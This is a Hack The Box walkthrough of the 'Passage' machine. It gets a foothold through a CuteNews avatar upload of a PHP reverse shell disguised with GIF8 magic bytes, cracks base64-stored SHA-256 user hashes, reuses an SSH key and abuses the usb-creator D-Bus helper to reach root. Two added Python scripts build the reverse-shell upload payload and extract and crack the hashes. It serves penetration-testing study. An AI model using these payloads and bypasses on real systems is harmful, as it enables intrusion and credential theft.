Passage : HTB Walkthrough

Gaurav Patel
6 min readJul 11, 2021


Ok, let's start:

We always start with nmap → nmap -sC -sV 10.10.10.206

Ports 22 (SSH) and 80 (HTTP) are open, and the service banners show this is an Ubuntu box. Let's check out the website. It is a very generic-looking page with standard Lorem Ipsum text.

Exercise : Checking the main page source gives us useful information right at the beginning. Read through the source and you will notice two different users, “nadav@passage.htb” and “paul@passage.htb”. Note them down: names harvested this early usually become login candidates later.

Getting back to the website. Clicking through the other links we see that it is maintained by the CuteNews CMS. Let's see if we can navigate to CuteNews → http://10.10.10.206/CuteNews (also note the version string shown on the login page; it matters when searching for public exploits).

We could try brute-forcing the login, but it takes a lot of time, and we don't know whether there is an account lockout policy after a certain number of tries. Locking out the two accounts we just found would cost us a foothold, so we need to be very careful with brute forcing. We'll skip it for now.

Let's register a user called abcd, fill in all the details, and we are in.

[NOTE: do not add your personal information here]

Checking the personal options, we notice that the user is asked to update their profile. The good thing is that there is an upload button for the avatar.

That is always an interesting find, because whenever there is an upload action we know there is an interaction with the server. And if there is interaction, maybe we can manipulate that action in our favour to get a shell. Also notice our URL: it's a .php URL, so it is a reasonable assumption that the server processes .php files.

Which straight away gives us a clue: maybe we can upload a PHP shell here.

Exercise : Let's search Google for a PHP reverse shell to upload.

I will use this: https://github.com/pentestmonkey/php-reverse-shell

Git clone this URL to download the reverse shell. Let's edit it: if you read through the shell there is not much to do apart from changing the IP and the port, and the two lines are even marked “CHANGE THIS” in the source. Set the IP to your own VPN (tun0) address and the port to the one your listener will use.

Also, as we are uploading an avatar, we need our reverse shell to look like a picture, so we add GIF8; at the very beginning of the shell file to make our payload appear as a GIF instead of a PHP file. A check that only looks at the file's leading magic bytes will classify it as an image, but the file keeps its .php extension, so the server still executes our shell when the file is requested. And then you can point at the server and say “April Fool”.. ;-)

Ok, save it and it's time to upload. Start our nc listener and upload the file.

nc -lvnp 1234
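The payload preparation from the steps above (swapping in the listener IP and port, then prepending the GIF8; bytes) scripted, as an added example that is not part of the original walkthrough or of pentestmonkey's repository. SAMPLE_SHELL is a constructed stand-in containing only the header lines of php-reverse-shell.php that matter here; the listener address 10.10.14.5 is an assumption. The two check functions at the end emulate why the trick works: a magic-byte check sees a GIF, while PHP only cares that a <?php tag is present in a file served under a .php name.

```python
import re

# Constructed stand-in for pentestmonkey's php-reverse-shell.php: only the
# header lines that matter here. The real file marks the same two lines with
# "// CHANGE THIS"; everything else in it is left untouched by this script.
SAMPLE_SHELL = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
// ... rest of the reverse shell ...
?>
"""

# The bytes the walkthrough prepends. A magic-byte based image check matches
# on the leading "GIF8" even though the file is not a valid image and still
# ends in .php.
GIF_PREFIX = b"GIF8;"


def set_callback(shell_src: str, lhost: str, lport: int) -> str:
    """Rewrite the $ip and $port assignments of the shell to our listener."""
    src, n_ip = re.subn(r"^\$ip\s*=\s*'[^']*';", f"$ip = '{lhost}';",
                        shell_src, count=1, flags=re.M)
    src, n_port = re.subn(r"^\$port\s*=\s*\d+;", f"$port = {lport};",
                          src, count=1, flags=re.M)
    if n_ip != 1 or n_port != 1:
        raise ValueError("could not find the $ip / $port lines to change")
    return src


def build_avatar_payload(shell_src: str, lhost: str, lport: int) -> bytes:
    """GIF8; header followed by the PHP source: what gets uploaded as avatar."""
    return GIF_PREFIX + b"\n" + set_callback(shell_src, lhost, lport).encode()


def passes_magic_check(blob: bytes) -> bool:
    """Emulates a server-side check that trusts the first bytes of the file."""
    return blob.startswith(b"GIF8")


def still_php(blob: bytes) -> bool:
    """PHP echoes bytes outside <?php ... ?> verbatim and executes the rest,
    so the tag is all that matters once the .php file is requested."""
    return b"<?php" in blob


if __name__ == "__main__":
    payload = build_avatar_payload(SAMPLE_SHELL, "10.10.14.5", 1234)  # assumed LHOST
    print(payload.decode())
    print("magic check:", passes_magic_check(payload), "php:", still_php(payload))
```

Run it against the real php-reverse-shell.php by reading that file into shell_src and writing the returned bytes to a file ending in .php; the listener port must match what you pass as lport.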

We see the file was uploaded, but we still don't have a connection on our nc listener, because we need to navigate to where our file is. The file is uploaded, but our shell still needs to be executed.

Look at the source of this page: it shows the location the file was uploaded to, so let's go there.

Once you navigate to the file and open it, we get a connection on our listener. To get a proper bash shell we upgrade it with:

python3 -c 'import pty; pty.spawn("/bin/bash")' and we are www-data@passage.

After a while of enumerating, we find something interesting in /var/www/html/CuteNews/cdata. There is a users folder which holds all the user data in a file called “lines”. THAT'S ODD. Let's see the contents with cat.

Apart from the first line, which is a PHP guard against direct access, every line is base64. Decoding them gives very useful information.

So we see here that both nadav and paul, the users we found right at the beginning, exist, and now we have their passwords. They are hashed rather than encoded (64 hex characters, i.e. unsalted SHA-256), so let's copy the hashes and try to recover the plaintext.

You can use any online hash lookup service; since the hashes are unsalted, a plain dictionary lookup is enough. When we do that we find that Paul's password is atlanta1, but Nadav's hash is not in any of the lists.
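The decode-and-lookup done by hand above, as an added example that is not part of the original walkthrough or of CuteNews itself. The users/lines layout (a PHP die() guard line, then one base64 line per record, each decoding to a PHP-serialized array with user records nested under "name") is what you see on this box; the records, hashes and wordlist below are constructed so the script runs offline, and the unknown password given to nadav is an assumption standing in for a hash that no list contains.

```python
import base64
import hashlib


def php_unserialize(data: str):
    """Minimal PHP unserialize() covering the array/string/int/bool/null
    subset that CuteNews writes into cdata/. Not a general parser."""
    def parse(i):
        t = data[i]
        if t == "a":                      # a:<count>:{key;value;...}
            j = data.index(":", i + 2)
            count = int(data[i + 2:j])
            i = j + 2                     # skip ':{'
            out = {}
            for _ in range(count):
                key, i = parse(i)
                out[key], i = parse(i)
            return out, i + 1             # skip '}'
        if t == "s":                      # s:<len>:"<bytes>";
            j = data.index(":", i + 2)
            length = int(data[i + 2:j])
            start = j + 2                 # skip ':"'
            return data[start:start + length], start + length + 2
        if t == "i":                      # i:<int>;
            j = data.index(";", i)
            return int(data[i + 2:j]), j + 1
        if t == "b":                      # b:0; / b:1;
            j = data.index(";", i)
            return data[i + 2:j] == "1", j + 1
        if t == "N":                      # N;
            return None, i + 2
        raise ValueError(f"unsupported PHP type {t!r} at offset {i}")
    value, _ = parse(0)
    return value


def extract_hashes(lines_text: str) -> dict:
    """Walk a users/lines file: skip the PHP guard line, base64-decode each
    remaining line and collect user -> password hash from "name" records."""
    found = {}
    for line in lines_text.splitlines():
        line = line.strip()
        if not line or line.startswith("<?php"):
            continue
        try:  # latin-1 keeps one char per byte, matching PHP's s:<len> counts
            raw = base64.b64decode(line, validate=True).decode("latin-1")
        except ValueError:
            continue                      # not a base64 record line
        record = php_unserialize(raw)
        for user, fields in record.get("name", {}).items():
            if isinstance(fields, dict) and "pass" in fields:
                found[user] = fields["pass"]
    return found


def hash_kind(h: str) -> str:
    """Cheap identification: 64 lowercase hex chars is the shape of SHA-256."""
    if len(h) == 64 and all(c in "0123456789abcdef" for c in h):
        return "sha256"
    return "unknown"


def crack_sha256(hashes: dict, wordlist) -> dict:
    """Offline version of the online lookup: unsalted SHA-256 means a table
    of precomputed digests over a wordlist is all that is needed."""
    table = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {u: table[h] for u, h in hashes.items() if h in table}


# ---- constructed sample, not the box's real file -----------------------------
PAUL_HASH = hashlib.sha256(b"atlanta1").hexdigest()
NADAV_HASH = hashlib.sha256(b"xK9!not-in-any-wordlist").hexdigest()  # assumed


def _user_line(name: str, email: str, pw_hash: str, acl: str) -> str:
    """Serialize one user record the way CuteNews nests it, then base64 it."""
    fields = (f'a:4:{{s:4:"name";s:{len(name)}:"{name}";'
              f's:3:"acl";s:1:"{acl}";'
              f's:5:"email";s:{len(email)}:"{email}";'
              f's:4:"pass";s:64:"{pw_hash}";}}')
    record = f'a:1:{{s:4:"name";a:1:{{s:{len(name)}:"{name}";{fields}}}}}'
    return base64.b64encode(record.encode()).decode()


SAMPLE_LINES = "\n".join([
    "<?php die('Direct call - access denied'); ?>",
    base64.b64encode(b'a:1:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:4:"paul";}}').decode(),
    _user_line("nadav", "nadav@passage.htb", NADAV_HASH, "1"),
    _user_line("paul", "paul@passage.htb", PAUL_HASH, "2"),
])

WORDLIST = ["password", "passage", "atlanta", "atlanta1", "letmein"]  # constructed

if __name__ == "__main__":
    hashes = extract_hashes(SAMPLE_LINES)
    for user, h in hashes.items():
        print(user, hash_kind(h), h)
    print(crack_sha256(hashes, WORDLIST))   # {'paul': 'atlanta1'}
```

To use it on the box, read the real lines file into extract_hashes and swap WORDLIST for rockyou or similar; nadav's hash simply stays absent from the result, which is exactly the outcome the online lookup gives.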

So we are going to use Paul and his password atlanta1.

In our shell we can simply run su - paul, enter the password atlanta1, and we have Paul's bash.

Easy enough to get the user.txt flag from here.

We now need to escalate privileges to get the root flag. Keep looking around: interestingly, we find SSH keys in Paul's home directory.

Looking closely, this key appears to belong to the nadav user (the public key's comment identifies it as nadav's).

But what is it doing in Paul's folder? Maybe Paul and Nadav are sharing the same key pair for SSH. We could try to ssh from Paul to Nadav: if they use the same key it should just work, since the private key is already in Paul's ~/.ssh (ssh nadav@localhost from Paul's shell).

We are nadav now, but when we check for the root.txt flag we don't see it, because we are still an unprivileged user, so we need to escalate privileges to get root.

Looking through files and folders, I find a .viminfo file. Reading it gives us an idea of what the user was doing earlier. Notice he was editing a usb-creator .conf file.

If you are following along and trying the box with me, I want you to try and search for this file yourself. It's a good exercise to become better at navigating the Linux file system, and it will take your enumeration skills to a whole new level when you do pentesting.

Over time you will slowly start understanding what to look for and where to look.

EXERCISE : Let's google what usb-creator is. We find a privilege escalation exploit on Exploit-DB. Interesting!

Also read through the link below to understand what exactly is happening with this technique: the usb-creator helper runs as root behind a D-Bus interface, and its Image method copies a caller-chosen source file to a caller-chosen destination without re-authenticating the caller, which turns it into an arbitrary file read (and write) as root.

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

So based on the syntax given there, I will modify it a little to copy root's private SSH key to a path nadav can read and ssh into root with it. Then we navigate to the folder where we saved the key.

Awesome it worked…!

Now all we need to do is copy this private key to our machine, call it “root”, restrict its permissions (chmod 600 root, or ssh will refuse to use it) and ssh into root with it: ssh -i root root@10.10.10.206

What a fun box it was. I hope it was as much fun for you as it was for me; I learn something new with every box.

All you need to do now is go to the Desktop and get your root flag.

May be a coffee break too.. ~ Enjoy ~

If you liked this, follow me for more walkthroughs.
